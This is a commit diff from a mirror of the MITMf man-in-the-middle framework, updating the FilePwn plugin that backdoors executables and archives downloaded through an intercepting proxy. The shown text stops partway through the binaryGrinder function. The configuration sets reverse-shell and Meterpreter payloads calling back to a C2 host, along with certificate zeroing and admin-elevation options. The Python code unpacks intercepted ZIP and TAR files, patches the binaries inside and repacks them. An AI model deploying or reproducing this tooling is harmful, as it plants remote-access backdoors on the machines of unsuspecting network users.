mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 05:22:15 -07:00
Updated Filepwn plugin to the latest BDFactory & BDFProxy version
This commit is contained in:
parent
1a50f000c1
commit
1a5c7c03b7
6 changed files with 542 additions and 508 deletions
|
@ -7,4 +7,4 @@ before_install:
|
||||||
- "sudo apt-get install libpcap0.8-dev libnetfilter-queue-dev"
|
- "sudo apt-get install libpcap0.8-dev libnetfilter-queue-dev"
|
||||||
|
|
||||||
install: "pip install -r requirements.txt"
|
install: "pip install -r requirements.txt"
|
||||||
script: python tests/basic_tests.py
|
script: python tests/basic_tests.py
|
|
@ -334,172 +334,186 @@
|
||||||
|
|
||||||
[FilePwn]
|
[FilePwn]
|
||||||
|
|
||||||
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
#
|
||||||
|
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||||
|
#
|
||||||
|
# Copyright (c) 2013-2014, Joshua Pitts
|
||||||
|
# All rights reserved.
|
||||||
#
|
#
|
||||||
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
# Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
# are permitted provided that the following conditions are met:
|
||||||
#
|
#
|
||||||
# Copyright (c) 2013-2014, Joshua Pitts
|
# 1. Redistributions of source code must retain the above copyright notice,
|
||||||
# All rights reserved.
|
# this list of conditions and the following disclaimer.
|
||||||
#
|
#
|
||||||
# Redistribution and use in source and binary forms, with or without modification,
|
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
||||||
# are permitted provided that the following conditions are met:
|
# this list of conditions and the following disclaimer in the documentation
|
||||||
|
# and/or other materials provided with the distribution.
|
||||||
#
|
#
|
||||||
# 1. Redistributions of source code must retain the above copyright notice,
|
# 3. Neither the name of the copyright holder nor the names of its contributors
|
||||||
# this list of conditions and the following disclaimer.
|
# may be used to endorse or promote products derived from this software without
|
||||||
|
# specific prior written permission.
|
||||||
#
|
#
|
||||||
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||||
# this list of conditions and the following disclaimer in the documentation
|
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||||
# and/or other materials provided with the distribution.
|
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||||
|
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||||
|
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||||
|
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||||
|
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||||
|
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||||
|
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||||
|
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||||
|
# POSSIBILITY OF SUCH DAMAGE.
|
||||||
#
|
#
|
||||||
# 3. Neither the name of the copyright holder nor the names of its contributors
|
|
||||||
# may be used to endorse or promote products derived from this software without
|
|
||||||
# specific prior written permission.
|
|
||||||
#
|
|
||||||
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
|
||||||
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
|
||||||
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
|
||||||
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
|
||||||
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
|
||||||
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
|
||||||
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
|
||||||
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
|
||||||
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
# POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
#
|
|
||||||
# Tested on Kali-Linux.
|
|
||||||
|
|
||||||
[[hosts]]
|
[[hosts]]
|
||||||
#whitelist host/IP - patch these only.
|
#whitelist host/IP - patch these only.
|
||||||
#ALL is everything, use the blacklist to leave certain hosts/IPs out
|
#ALL is everything, use the blacklist to leave certain hosts/IPs out
|
||||||
|
|
||||||
whitelist = ALL
|
whitelist = ALL
|
||||||
|
|
||||||
#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.
|
#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.
|
||||||
|
|
||||||
blacklist = , # a comma is null do not leave blank
|
blacklist = , # a comma is null do not leave blank
|
||||||
|
|
||||||
|
|
||||||
[[keywords]]
|
[[keywords]]
|
||||||
#These checks look at the path of a url for keywords
|
#These checks look at the path of a url for keywords
|
||||||
|
|
||||||
whitelist = ALL
|
whitelist = ALL
|
||||||
|
|
||||||
#For blacklist note binaries that you do not want to touch at all
|
#For blacklist note binaries that you do not want to touch at all
|
||||||
|
|
||||||
# Also applied in zip files
|
# Also applied in zip files
|
||||||
|
|
||||||
|
blacklist = .dll
|
||||||
|
|
||||||
blacklist = Tcpview.exe, skype.exe, .dll
|
|
||||||
|
|
||||||
[[ZIP]]
|
[[ZIP]]
|
||||||
# patchCount is the max number of files to patch in a zip file
|
# patchCount is the max number of files to patch in a zip file
|
||||||
# After the max is reached it will bypass the rest of the files
|
# After the max is reached it will bypass the rest of the files
|
||||||
# and send on it's way
|
# and send on it's way
|
||||||
|
|
||||||
patchCount = 5
|
patchCount = 5
|
||||||
|
|
||||||
# In Bytes
|
# In Bytes
|
||||||
maxSize = 40000000
|
maxSize = 50000000
|
||||||
|
|
||||||
blacklist = .dll, #don't do dlls in a zip file
|
blacklist = .dll, #don't do dlls in a zip file
|
||||||
|
|
||||||
[[TAR]]
|
[[TAR]]
|
||||||
# patchCount is the max number of files to patch in a tar file
|
# patchCount is the max number of files to patch in a tar file
|
||||||
# After the max is reached it will bypass the rest of the files
|
# After the max is reached it will bypass the rest of the files
|
||||||
# and send on it's way
|
# and send on it's way
|
||||||
|
|
||||||
patchCount = 5
|
patchCount = 5
|
||||||
|
|
||||||
# In Bytes
|
# In Bytes
|
||||||
maxSize = 40000000
|
maxSize = 10000000
|
||||||
|
|
||||||
blacklist = , # a comma is null do not leave blank
|
blacklist = , # a comma is null do not leave blank
|
||||||
|
|
||||||
[[targets]]
|
[[targets]]
|
||||||
#MAKE SURE that your settings for host and port DO NOT
|
#MAKE SURE that your settings for host and port DO NOT
|
||||||
# overlap between different types of payloads
|
# overlap between different types of payloads
|
||||||
|
|
||||||
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
|
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
|
||||||
|
|
||||||
|
LinuxType = ALL # choices: x86/x64/ALL/None
|
||||||
|
WindowsType = ALL # choices: x86/x64/ALL/None
|
||||||
|
FatPriority = x64 # choices: x86 or x64
|
||||||
|
|
||||||
|
FileSizeMax = 10000000 # ~10 MB (just under) No patching of files this large
|
||||||
|
|
||||||
LinuxType = ALL # choices: x86/x64/ALL/None
|
CompressedFiles = True #True/False
|
||||||
WindowsType = ALL # choices: x86/x64/ALL/None
|
|
||||||
FatPriority = x64 # choices: x86 or x64
|
|
||||||
|
|
||||||
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
|
||||||
|
|
||||||
CompressedFiles = True #True/False
|
|
||||||
|
|
||||||
[[[[LinuxIntelx86]]]]
|
[[[[LinuxIntelx86]]]]
|
||||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||||
HOST = 192.168.1.168 # The C2
|
HOST = 192.168.1.168 # The C2
|
||||||
PORT = 8888
|
PORT = 8888
|
||||||
SUPPLIED_SHELLCODE = None
|
SUPPLIED_SHELLCODE = None
|
||||||
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
||||||
|
|
||||||
[[[[LinuxIntelx64]]]]
|
[[[[LinuxIntelx64]]]]
|
||||||
SHELL = reverse_shell_tcp
|
SHELL = reverse_shell_tcp
|
||||||
HOST = 192.168.1.16
|
HOST = 192.168.1.16
|
||||||
PORT = 9999
|
PORT = 9999
|
||||||
SUPPLIED_SHELLCODE = None
|
SUPPLIED_SHELLCODE = None
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||||
|
|
||||||
[[[[WindowsIntelx86]]]]
|
[[[[WindowsIntelx86]]]]
|
||||||
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||||
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
|
||||||
PATCH_METHOD =
|
PATCH_METHOD =
|
||||||
HOST = 172.16.206.7
|
HOST = 192.168.1.16
|
||||||
PORT = 8444
|
PORT = 8090
|
||||||
SHELL = iat_reverse_tcp_stager_threaded
|
# SHELL for use with automatic PATCH_METHOD
|
||||||
SUPPLIED_SHELLCODE = None
|
SHELL = iat_reverse_tcp_inline_threaded
|
||||||
ZERO_CERT = False
|
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
|
||||||
PATCH_DLL = True
|
SUPPLIED_SHELLCODE = None
|
||||||
MSFPAYLOAD = windows/meterpreter/reverse_tcp
|
ZERO_CERT = True
|
||||||
|
# PATCH_DLLs as they come across
|
||||||
|
PATCH_DLL = False
|
||||||
|
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
|
||||||
|
RUNAS_ADMIN = True
|
||||||
|
# XP_MODE - to support XP targets
|
||||||
|
XP_MODE = True
|
||||||
|
# SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and
|
||||||
|
# with PATCH_METHOD 'replace' use an EXE not DLL
|
||||||
|
SUPPLIED_BINARY = veil_go_payload.exe
|
||||||
|
MSFPAYLOAD = windows/meterpreter/reverse_tcp
|
||||||
|
|
||||||
[[[[WindowsIntelx64]]]]
|
[[[[WindowsIntelx64]]]]
|
||||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||||
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
# PATCH_METHOD overwrites PATCH_TYPE, use automatic or onionduke
|
||||||
PATCH_METHOD =
|
PATCH_METHOD = automatic
|
||||||
HOST = 172.16.206.1
|
HOST = 192.168.1.16
|
||||||
PORT = 8088
|
PORT = 8088
|
||||||
SHELL = iat_reverse_tcp_stager_threaded
|
# SHELL for use with automatic PATCH_METHOD
|
||||||
SUPPLIED_SHELLCODE = None
|
SHELL = iat_reverse_tcp_stager_threaded
|
||||||
ZERO_CERT = True
|
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
|
||||||
PATCH_DLL = False
|
SUPPLIED_SHELLCODE = None
|
||||||
MSFPAYLOAD = windows/x64/shell/reverse_tcp
|
ZERO_CERT = True
|
||||||
|
PATCH_DLL = True
|
||||||
|
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
|
||||||
|
RUNAS_ADMIN = True
|
||||||
|
# SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and
|
||||||
|
# with PATCH_METHOD 'replace' use an EXE not DLL
|
||||||
|
SUPPLIED_BINARY = pentest_x64_payload.exe
|
||||||
|
MSFPAYLOAD = windows/x64/shell/reverse_tcp
|
||||||
|
|
||||||
[[[[MachoIntelx86]]]]
|
[[[[MachoIntelx86]]]]
|
||||||
SHELL = reverse_shell_tcp
|
SHELL = reverse_shell_tcp
|
||||||
HOST = 192.168.1.16
|
HOST = 192.168.1.16
|
||||||
PORT = 4444
|
PORT = 4444
|
||||||
SUPPLIED_SHELLCODE = None
|
SUPPLIED_SHELLCODE = None
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||||
|
|
||||||
[[[[MachoIntelx64]]]]
|
[[[[MachoIntelx64]]]]
|
||||||
SHELL = reverse_shell_tcp
|
SHELL = reverse_shell_tcp
|
||||||
HOST = 192.168.1.16
|
HOST = 192.168.1.16
|
||||||
PORT = 5555
|
PORT = 5555
|
||||||
SUPPLIED_SHELLCODE = None
|
SUPPLIED_SHELLCODE = None
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||||
|
|
||||||
# Call out the difference for targets here as they differ from ALL
|
# Call out the difference for targets here as they differ from ALL
|
||||||
# These settings override the ALL settings
|
# These settings override the ALL settings
|
||||||
|
|
||||||
[[[sysinternals.com]]]
|
|
||||||
LinuxType = None
|
|
||||||
WindowsType = x86
|
|
||||||
CompressedFiles = False
|
|
||||||
|
|
||||||
|
[[[sysinternals.com]]]
|
||||||
|
LinuxType = None
|
||||||
|
WindowsType = ALL
|
||||||
|
CompressedFiles = False
|
||||||
#inherits WindowsIntelx32 from ALL
|
#inherits WindowsIntelx32 from ALL
|
||||||
[[[[WindowsIntelx86]]]]
|
[[[[WindowsIntelx86]]]]
|
||||||
PATCH_DLL = False
|
PATCH_DLL = False
|
||||||
ZERO_CERT = True
|
ZERO_CERT = True
|
||||||
|
|
||||||
[[[sourceforge.org]]]
|
[[[sourceforge.org]]]
|
||||||
WindowsType = x64
|
WindowsType = x64
|
||||||
CompressedFiles = False
|
CompressedFiles = False
|
||||||
|
|
||||||
[[[[WindowsIntelx64]]]]
|
[[[[WindowsIntelx64]]]]
|
||||||
PATCH_DLL = False
|
PATCH_DLL = False
|
||||||
|
|
||||||
[[[[WindowsIntelx86]]]]
|
[[[[WindowsIntelx86]]]]
|
||||||
PATCH_DLL = False
|
PATCH_DLL = False
|
||||||
|
|
|
@ -111,8 +111,6 @@ class ProxyPlugins:
|
||||||
for f in self.plugin_mthds[fname]:
|
for f in self.plugin_mthds[fname]:
|
||||||
a = f(**args)
|
a = f(**args)
|
||||||
if a != None: args = a
|
if a != None: args = a
|
||||||
except KeyError as e:
|
|
||||||
pass
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
#This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
|
#This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
|
||||||
log.error("Exception occurred in hooked function")
|
log.error("Exception occurred in hooked function")
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
Subproject commit 7a19089bd9620e736a56ecde145206cec261cc67
|
Subproject commit dadf1d21bfcb9c8ebefc7891bd95b9452b2af8d5
|
|
@ -61,11 +61,13 @@ import pefile
|
||||||
import zipfile
|
import zipfile
|
||||||
import logging
|
import logging
|
||||||
import shutil
|
import shutil
|
||||||
|
import tempfile
|
||||||
import random
|
import random
|
||||||
import string
|
import string
|
||||||
import threading
|
import threading
|
||||||
import multiprocessing
|
import multiprocessing
|
||||||
import tarfile
|
import tarfile
|
||||||
|
import magic
|
||||||
|
|
||||||
from libs.bdfactory import pebin
|
from libs.bdfactory import pebin
|
||||||
from libs.bdfactory import elfbin
|
from libs.bdfactory import elfbin
|
||||||
|
@ -90,37 +92,23 @@ class FilePwn(Plugin):
|
||||||
from core.msfrpc import Msf
|
from core.msfrpc import Msf
|
||||||
self.msf = Msf()
|
self.msf = Msf()
|
||||||
|
|
||||||
#FOR FUTURE USE
|
self.binaryMimeType = {'mimes': ['application/octet-stream', 'application/x-msdownload',
|
||||||
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
|
'application/x-msdos-program', 'binary/octet-stream',
|
||||||
|
'application/x-executable', 'application/x-dosexec']}
|
||||||
#FOR FUTURE USE
|
|
||||||
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
|
|
||||||
|
|
||||||
#USED NOW
|
self.zipType = {'mimes': ['application/x-zip-compressed', 'application/zip'], 'params': {'type': 'ZIP', 'format': 'zip', 'filter': None}} # .zip
|
||||||
self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
|
|
||||||
'pe': {'number': 'MZ', 'offset': 0},
|
self.gzType = {'mimes': ['application/gzip', 'application/x-gzip', 'application/gnutar'], 'params': {'type': 'TAR', 'format': 'ustar', 'filter': 'gzip'}} # .gz
|
||||||
'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
|
|
||||||
'bz': {'number': 'BZ', 'offset': 0},
|
self.tarType = {'mimes': ['application/x-tar'], 'params': {'type': 'TAR', 'format': 'gnutar', 'filter': None}} # .tar
|
||||||
'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
|
|
||||||
'tar': {'number': 'ustar', 'offset': 257},
|
self.bzType = {'mimes': ['application/x-bzip2', 'application/x-bzip'], 'params': {'type': 'TAR', 'format': 'gnutar', 'filter': 'bzip2'}} # .bz / .bz2
|
||||||
'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
|
|
||||||
'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
|
self.archiveTypes = [self.zipType, self.gzType, self.tarType, self.bzType]
|
||||||
'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
|
|
||||||
}
|
|
||||||
|
|
||||||
#NOT USED NOW
|
|
||||||
self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
|
||||||
|
|
||||||
#FilePwn options
|
#FilePwn options
|
||||||
self.userConfig = self.config['FilePwn']
|
self.set_config()
|
||||||
self.hostblacklist = self.userConfig['hosts']['blacklist']
|
self.parse_target_config(self.user_config['targets']['ALL'])
|
||||||
self.hostwhitelist = self.userConfig['hosts']['whitelist']
|
|
||||||
self.keysblacklist = self.userConfig['keywords']['blacklist']
|
|
||||||
self.keyswhitelist = self.userConfig['keywords']['whitelist']
|
|
||||||
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
|
||||||
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
|
||||||
self.parse_target_config(self.userConfig['targets']['ALL'])
|
|
||||||
|
|
||||||
|
|
||||||
self.tree_info.append("Connected to Metasploit v{}".format(self.msf.version))
|
self.tree_info.append("Connected to Metasploit v{}".format(self.msf.version))
|
||||||
|
|
||||||
|
@ -142,19 +130,209 @@ class FilePwn(Plugin):
|
||||||
def on_config_change(self):
|
def on_config_change(self):
|
||||||
self.initialize(self.options)
|
self.initialize(self.options)
|
||||||
|
|
||||||
def convert_to_Bool(self, aString):
|
def str2bool(self, val):
|
||||||
if aString.lower() == 'true':
|
if val.lower() == 'true':
|
||||||
return True
|
return True
|
||||||
elif aString.lower() == 'false':
|
elif val.lower() == 'false':
|
||||||
return False
|
return False
|
||||||
elif aString.lower() == 'none':
|
else:
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def bytes_have_format(self, bytess, formatt):
|
def inject(self, data):
|
||||||
number = self.magicNumbers[formatt]
|
|
||||||
if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
|
if len(data) > self.archive_max_size:
|
||||||
return True
|
self.log.error("{0} over allowed size".format(self.archive_type))
|
||||||
return False
|
return data
|
||||||
|
|
||||||
|
buf = None
|
||||||
|
|
||||||
|
if self.archive_type == "ZIP":
|
||||||
|
buf = self.inject_zip(data)
|
||||||
|
elif self.archive_type == "TAR":
|
||||||
|
buf = self.inject_tar(data, self.archive_params['filter'])
|
||||||
|
|
||||||
|
return buf
|
||||||
|
|
||||||
|
def inject_tar(self, aTarFileBytes, formatt=None):
|
||||||
|
# When called will unpack and edit a Tar File and return a tar file"
|
||||||
|
|
||||||
|
tmp_file = tempfile.NamedTemporaryFile()
|
||||||
|
tmp_file.write(aTarFileBytes)
|
||||||
|
tmp_file.seek(0)
|
||||||
|
|
||||||
|
compression_mode = ':'
|
||||||
|
if formatt == 'gzip':
|
||||||
|
compression_mode = ':gz'
|
||||||
|
if formatt == 'bzip2':
|
||||||
|
compression_mode = ':bz2'
|
||||||
|
|
||||||
|
try:
|
||||||
|
tar_file = tarfile.open(fileobj=tmp_file, mode='r' + compression_mode)
|
||||||
|
except tarfile.ReadError as ex:
|
||||||
|
self.log.warning(ex)
|
||||||
|
tmp_file.close()
|
||||||
|
return aTarFileBytes
|
||||||
|
|
||||||
|
self.log.info("TarFile contents and info (compression: {0}):".format(formatt))
|
||||||
|
|
||||||
|
members = tar_file.getmembers()
|
||||||
|
for info in members:
|
||||||
|
print "\t{0} {1}".format(info.name, info.size)
|
||||||
|
|
||||||
|
new_tar_storage = tempfile.NamedTemporaryFile()
|
||||||
|
new_tar_file = tarfile.open(mode='w' + compression_mode, fileobj=new_tar_storage)
|
||||||
|
|
||||||
|
patch_count = 0
|
||||||
|
was_patched = False
|
||||||
|
|
||||||
|
for info in members:
|
||||||
|
self.log.info(">>> Next file in tarfile: {0}".format(info.name))
|
||||||
|
|
||||||
|
if not info.isfile():
|
||||||
|
self.log.warning("{0} is not a file, skipping".format(info.name))
|
||||||
|
new_tar_file.addfile(info, tar_file.extractfile(info))
|
||||||
|
continue
|
||||||
|
|
||||||
|
if info.size >= long(self.FileSizeMax):
|
||||||
|
self.log.warning("{0} is too big, skipping".format(info.name))
|
||||||
|
new_tar_file.addfile(info, tar_file.extractfile(info))
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Check against keywords
|
||||||
|
if self.check_keyword(info.name.lower()) is True:
|
||||||
|
self.log.info('Tar blacklist enforced on {0}'.format(info.name))
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Try to patch
|
||||||
|
extracted_file = tar_file.extractfile(info)
|
||||||
|
|
||||||
|
if patch_count >= self.archive_patch_count:
|
||||||
|
self.log.info("Met archive config patchCount limit. Adding original file")
|
||||||
|
new_tar_file.addfile(info, extracted_file)
|
||||||
|
else:
|
||||||
|
# create the file on disk temporarily for fileGrinder to run on it
|
||||||
|
with tempfile.NamedTemporaryFile() as tmp:
|
||||||
|
shutil.copyfileobj(extracted_file, tmp)
|
||||||
|
tmp.flush()
|
||||||
|
patch_result = self.binaryGrinder(tmp.name)
|
||||||
|
if patch_result:
|
||||||
|
patch_count += 1
|
||||||
|
file2 = os.path.join(BDFOLDER, os.path.basename(tmp.name))
|
||||||
|
self.log.info("{0} in archive patched, adding to final archive".format(info.name))
|
||||||
|
info.size = os.stat(file2).st_size
|
||||||
|
with open(file2, 'rb') as f:
|
||||||
|
new_tar_file.addfile(info, f)
|
||||||
|
os.remove(file2)
|
||||||
|
was_patched = True
|
||||||
|
else:
|
||||||
|
self.log.info("{0} patching failed. Keeping original file.".format(info.name))
|
||||||
|
with open(tmp.name, 'rb') as f:
|
||||||
|
new_tar_file.addfile(info, f)
|
||||||
|
|
||||||
|
# finalize the writing of the tar file first
|
||||||
|
new_tar_file.close()
|
||||||
|
|
||||||
|
if was_patched is False:
|
||||||
|
# If nothing was changed return the original
|
||||||
|
self.log.info("No files were patched. Forwarding original file")
|
||||||
|
new_tar_storage.close() # it's automatically deleted
|
||||||
|
return aTarFileBytes
|
||||||
|
|
||||||
|
# then read the new tar file into memory
|
||||||
|
new_tar_storage.seek(0)
|
||||||
|
buf = new_tar_storage.read()
|
||||||
|
new_tar_storage.close() # it's automatically deleted
|
||||||
|
|
||||||
|
return buf
|
||||||
|
|
||||||
|
def inject_zip(self, aZipFile):
|
||||||
|
# When called will unpack and edit a Zip File and return a zip file
|
||||||
|
tmp_file = tempfile.NamedTemporaryFile()
|
||||||
|
tmp_file.write(aZipFile)
|
||||||
|
tmp_file.seek(0)
|
||||||
|
|
||||||
|
zippyfile = zipfile.ZipFile(tmp_file.name, 'r')
|
||||||
|
|
||||||
|
# encryption test
|
||||||
|
try:
|
||||||
|
zippyfile.testzip()
|
||||||
|
except RuntimeError as e:
|
||||||
|
if 'encrypted' in str(e):
|
||||||
|
self.log.warning("Encrypted zipfile found. Not patching.")
|
||||||
|
else:
|
||||||
|
self.log.warning("Zipfile test failed. Returning original archive")
|
||||||
|
zippyfile.close()
|
||||||
|
tmp_file.close()
|
||||||
|
return aZipFile
|
||||||
|
|
||||||
|
self.log.info("ZipFile contents and info:")
|
||||||
|
|
||||||
|
for info in zippyfile.infolist():
|
||||||
|
print "\t{0} {1}".format(info.filename, info.file_size)
|
||||||
|
|
||||||
|
tmpDir = tempfile.mkdtemp()
|
||||||
|
zippyfile.extractall(tmpDir)
|
||||||
|
|
||||||
|
patch_count = 0
|
||||||
|
was_patched = False
|
||||||
|
|
||||||
|
for info in zippyfile.infolist():
|
||||||
|
self.log.info(">>> Next file in zipfile: {0}".format(info.filename))
|
||||||
|
actual_file = os.path.join(tmpDir, info.filename)
|
||||||
|
|
||||||
|
if os.path.islink(actual_file) or not os.path.isfile(actual_file):
|
||||||
|
self.log.warning("{0} is not a file, skipping".format(info.filename))
|
||||||
|
continue
|
||||||
|
|
||||||
|
if os.lstat(actual_file).st_size >= long(self.FileSizeMax):
|
||||||
|
self.log.warning("{0} is too big, skipping".format(info.filename))
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Check against keywords
|
||||||
|
if self.check_keyword(info.filename.lower()) is True:
|
||||||
|
self.log.info('Zip blacklist enforced on {0}'.format(info.filename))
|
||||||
|
continue
|
||||||
|
|
||||||
|
if patch_count >= self.archive_patch_count:
|
||||||
|
self.log.info("Met archive config patchCount limit. Adding original file")
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
patch_result = self.binaryGrinder(actual_file)
|
||||||
|
if patch_result:
|
||||||
|
patch_count += 1
|
||||||
|
file2 = os.path.join(BDFOLDER, os.path.basename(info.filename))
|
||||||
|
self.log.info("Patching complete, adding to archive file.")
|
||||||
|
shutil.copyfile(file2, actual_file)
|
||||||
|
self.log.info("{0} in archive patched, adding to final archive".format(info.filename))
|
||||||
|
os.remove(file2)
|
||||||
|
was_patched = True
|
||||||
|
else:
|
||||||
|
self.log.error("{0} patching failed. Keeping original file.".format(info.filename))
|
||||||
|
|
||||||
|
zippyfile.close()
|
||||||
|
|
||||||
|
if was_patched is False:
|
||||||
|
self.log.info("No files were patched. Forwarding original file")
|
||||||
|
tmp_file.close()
|
||||||
|
shutil.rmtree(tmpDir, ignore_errors=True)
|
||||||
|
return aZipFile
|
||||||
|
|
||||||
|
zip_result = zipfile.ZipFile(tmp_file.name, 'w', zipfile.ZIP_DEFLATED)
|
||||||
|
|
||||||
|
for base, dirs, files in os.walk(tmpDir):
|
||||||
|
for afile in files:
|
||||||
|
filename = os.path.join(base, afile)
|
||||||
|
zip_result.write(filename, arcname=filename.replace(tmpDir + '/', ''))
|
||||||
|
|
||||||
|
zip_result.close()
|
||||||
|
# clean up
|
||||||
|
shutil.rmtree(tmpDir, ignore_errors=True)
|
||||||
|
|
||||||
|
with open(tmp_file.name, 'rb') as f:
|
||||||
|
zip_data = f.read()
|
||||||
|
tmp_file.close()
|
||||||
|
|
||||||
|
return zip_data
|
||||||
|
|
||||||
def binaryGrinder(self, binaryFile):
|
def binaryGrinder(self, binaryFile):
|
||||||
"""
|
"""
|
||||||
|
@ -174,66 +352,72 @@ class FilePwn(Plugin):
|
||||||
magic = pe.OPTIONAL_HEADER.Magic
|
magic = pe.OPTIONAL_HEADER.Magic
|
||||||
machineType = pe.FILE_HEADER.Machine
|
machineType = pe.FILE_HEADER.Machine
|
||||||
|
|
||||||
#update when supporting more than one arch
|
# update when supporting more than one arch
|
||||||
if (magic == int('20B', 16) and machineType == 0x8664 and
|
if (magic == int('20B', 16) and machineType == 0x8664 and
|
||||||
self.WindowsType.lower() in ['all', 'x64']):
|
self.WindowsType.lower() in ['all', 'x64']):
|
||||||
add_section = False
|
add_section = False
|
||||||
cave_jumping = False
|
cave_jumping = False
|
||||||
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
|
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
|
||||||
add_section = True
|
add_section = True
|
||||||
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
|
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
|
||||||
cave_jumping = True
|
cave_jumping = True
|
||||||
|
|
||||||
# if automatic override
|
# if automatic override
|
||||||
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
|
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
|
||||||
cave_jumping = True
|
cave_jumping = True
|
||||||
|
|
||||||
targetFile = pebin.pebin(FILE=binaryFile,
|
targetFile = pebin.pebin(FILE=binaryFile,
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.WindowsIntelx64['SHELL'],
|
SHELL=self.WindowsIntelx64['SHELL'],
|
||||||
